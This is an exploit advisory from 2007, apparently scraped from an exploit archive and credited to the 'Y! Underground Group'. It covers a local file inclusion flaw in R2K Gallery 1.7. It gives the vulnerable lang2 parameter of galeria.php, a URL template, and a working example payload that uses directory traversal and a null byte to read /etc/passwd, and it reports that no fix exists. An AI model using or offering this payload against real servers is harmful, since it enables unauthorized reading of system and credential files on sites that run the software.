R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion Vulnerability

2007-05-11 00:00:00

\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]

----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/

---------------------------------------------------------------------

[!] Portal : R2K Gallery v1.7
[!] Download : http://usuarios.lycos.es/r2kscripts/
[!] Type : Local File Include Vuln

---------------------------------------------------------------------

---------------------------------------------------------------------

Bug :

http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]

Example :

http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00

---------------------------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.